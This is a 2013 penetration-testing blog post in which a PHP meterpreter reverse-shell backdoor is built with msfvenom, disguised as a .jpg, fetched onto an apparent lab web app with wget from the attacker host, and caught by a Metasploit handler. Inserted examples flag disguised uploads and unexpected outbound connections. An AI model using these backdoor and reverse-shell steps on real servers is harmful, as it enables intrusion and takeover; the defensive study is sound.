Friday, 17 May 2013

Hello everyone!

After some time I am back to finish this series of posts. I was a bit busy and ended up setting this paper aside, but let's wrap it up now! In this post we will see how to create a backdoor with msfvenom, which ships with Metasploit, to make it easier to get back into the compromised machine.

We will use the msfvenom command to create the backdoor:

root@bt:~# msfvenom
no options
Usage: /opt/metasploit/msf3/msfvenom [options] <var=val>

Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Output format (use --help-formats for a list)
-e, --encoder [encoder] The encoder to use
-a, --arch [architecture] The architecture to use
--platform [platform] The platform of the payload
-s, --space [length] The maximum size of the resulting payload
-b, --bad-chars [list] The list of characters to avoid example: '\x00\xff'
-i, --iterations [count] The number of times to encode the payload
-c, --add-code [path] Specify an additional win32 shellcode file to include
-x, --template [path] Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --options List the payload's standard options
-h, --help Show this message

root@bt:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 -f raw > /var/www/bd.php

root@bt:~# mv /var/www/bd.php /var/www/bd.jpg

Through the os-shell on the target machine, download the backdoor and rename it back to bd.php:

os-shell> wget http://192.168.77.137/bd.jpg
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:
---
--2012-08-26 23:47:21-- http://192.168.77.137/bd.php
Connecting to 192.168.77.137:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [text/html]
Saving to: `bd.php'

0K 100% 2.04M=0s

2012-08-26 23:47:21 (2.04 MB/s) - `bd.php' saved [10/10]
---
os-shell> pwd
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '/owaspbwa/owaspbwa-svn/var/www/WackoPicko/users'
os-shell> mv bd.jpg bd.php
do you want to retrieve the command standard output? [Y/n/a] y
No output
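The upload step above parks PHP source in the users image directory under a .jpg name and renames it once it is on disk. The following is an added example, not code from the original post or from Metasploit, showing the check a defender can run over such a directory: it flags files whose extension does not match their magic bytes, files that contain a PHP open tag regardless of name, and script extensions inside a directory that should only hold images. The directory layout, file contents, extension sets and magic-byte table are constructed for the example; the only thing taken from the post is the bd.jpg/bd.php naming.

```python
import os
import re
import tempfile
from pathlib import Path

# Extensions an image-upload directory is expected to hold, mapped to the
# magic bytes a genuine file of that type starts with (constructed table).
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Anything the PHP interpreter would treat as the start of code.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Script extensions that have no business in an image directory (assumed set).
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}


def scan_file(path: Path) -> list:
    """Return the findings for one file; an empty list means nothing suspicious."""
    findings = []
    ext = path.suffix.lower()
    head = path.read_bytes()[:4096]  # magic bytes and the open tag both sit at the start
    if ext in IMAGE_MAGIC and not head.startswith(IMAGE_MAGIC[ext]):
        findings.append("extension/magic mismatch")
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append("executable script in upload directory")
    if PHP_OPEN_TAG.search(head):
        findings.append("contains PHP open tag")
    return findings


def scan_upload_dir(root: Path) -> dict:
    """Walk an upload directory and map each suspicious file to its findings."""
    results = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = Path(dirpath) / name
            findings = scan_file(path)
            if findings:
                results[str(path.relative_to(root))] = findings
    return results


def build_sample_dir() -> Path:
    """Constructed stand-in for the users/ image directory seen in the transcript."""
    root = Path(tempfile.mkdtemp(prefix="uploads_"))
    # genuine uploads: real JPEG and PNG headers followed by filler
    (root / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 64)
    (root / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    # the disguise used in the post: PHP source carrying a .jpg name
    (root / "bd.jpg").write_bytes(b"<?php /* constructed stand-in, not a payload */ ?>")
    # the same file after the rename back to .php
    (root / "bd.php").write_bytes(b"<?php /* constructed stand-in, not a payload */ ?>")
    return root


if __name__ == "__main__":
    for name, findings in sorted(scan_upload_dir(build_sample_dir()).items()):
        print(f"{name}: {', '.join(findings)}")
```

On a real host the scan is pointed at the web root's upload directory instead of the temporary one. The scan catches the file at rest; the rename only pays off because the upload directory is served with PHP execution enabled, so serving it with the engine off for that directory (with mod_php, `php_admin_flag engine off` in the directory's Apache configuration) removes the payoff even when an upload slips through.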

Set up a handler and wait for the connection:

root@bt:~# msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.77.137 LPORT=443 E
[*] Please wait while we load the module tree...

I love shells --egypt

=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 932 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
=[ svn r15753 updated 11 days ago (2012.08.16)

Warning: This copy of the Metasploit Framework was last updated 11 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

PAYLOAD => php/meterpreter/reverse_tcp
LHOST => 192.168.77.137
LPORT => 443
[*] Started reverse handler on 192.168.77.137:443
[*] Starting the payload handler...

Open the backdoor in the browser and you will get a Meterpreter session in the console:

And that's it! Now you can do whatever you want with the site and the server.
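When bd.php is requested, the php/meterpreter/reverse_tcp payload runs inside the web server's PHP worker and that process opens an outbound TCP connection to the handler (192.168.77.137:443 in the post). The following is an added example, not code from the original post or from Metasploit, of the check a defender can run on the web host: it parses socket lines in `ss -tnp` layout and reports established connections owned by a web server process that are not inbound clients on the service ports and whose peer is not on the egress allowlist. The socket table, process names, service ports and allowlist subnet are constructed for the example; the only value taken from the post is the handler address.

```python
import re
from ipaddress import ip_address, ip_network

# Process names under which PHP code runs on a typical LAMP host (assumed set).
WEB_SERVER_PROCS = {"apache2", "httpd", "php-fpm", "php5-fpm", "nginx"}
# Ports the web tier listens on; a socket with one of these as the local port
# is an inbound client, not something the server reached out to.
SERVICE_PORTS = {80, 443}
# Where the web tier is allowed to open connections to (constructed: say, the
# database / internal API subnet).
EGRESS_ALLOWLIST = [ip_network("10.0.5.0/24")]

# One socket line in `ss -tnp` layout:
# State Recv-Q Send-Q Local:Port Peer:Port users:(("proc",pid=N,fd=M))
SS_LINE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)'
    r'\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def _split_endpoint(endpoint: str):
    """'192.168.77.140:80' -> ('192.168.77.140', 80); strips IPv6 brackets."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def parse_ss_line(line: str):
    """Parse one ss line into a dict, or return None for lines in another shape."""
    m = SS_LINE.match(line.strip())
    if not m:
        return None
    local_ip, local_port = _split_endpoint(m.group("local"))
    peer_ip, peer_port = _split_endpoint(m.group("peer"))
    return {
        "state": m.group("state"),
        "local_ip": local_ip, "local_port": local_port,
        "peer_ip": peer_ip, "peer_port": peer_port,
        "proc": m.group("proc"), "pid": int(m.group("pid")),
    }


def suspicious_web_egress(lines):
    """Established, outbound, non-allowlisted connections owned by a web server process."""
    hits = []
    for line in lines:
        rec = parse_ss_line(line)
        if rec is None or rec["state"] != "ESTAB":
            continue
        if rec["proc"] not in WEB_SERVER_PROCS:
            continue
        if rec["local_port"] in SERVICE_PORTS:
            continue  # a browser talking to the site, which is expected
        if any(ip_address(rec["peer_ip"]) in net for net in EGRESS_ALLOWLIST):
            continue
        hits.append(rec)
    return hits


# Constructed socket table for a web host at 192.168.77.140; the handler
# address 192.168.77.137:443 is the one value taken from the post.
SAMPLE_SS_LINES = [
    'ESTAB 0 0 192.168.77.140:80 192.168.77.10:51522 users:(("apache2",pid=2210,fd=14))',
    'ESTAB 0 0 192.168.77.140:40112 10.0.5.20:3306 users:(("apache2",pid=2210,fd=15))',
    'ESTAB 0 0 192.168.77.140:55824 192.168.77.137:443 users:(("apache2",pid=2213,fd=16))',
    'ESTAB 0 0 192.168.77.140:22 192.168.77.10:50010 users:(("sshd",pid=900,fd=4))',
]

if __name__ == "__main__":
    for rec in suspicious_web_egress(SAMPLE_SS_LINES):
        print(f'{rec["proc"]}[{rec["pid"]}] -> {rec["peer_ip"]}:{rec["peer_port"]}')
```

On a live host the lines come from `ss -tnp` run as root (the process column is only populated with sufficient privileges). The discriminator is which process owns the socket and in which direction it was opened, not the port: a reverse payload pointed at 443 is indistinguishable from HTTPS by port alone, but a web server worker has no reason to originate a connection to a host outside its allowlist.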

Everything shown in this series of posts belongs to Sumedt Jitpukdebodin; the content is for study purposes, so be careful what you do...
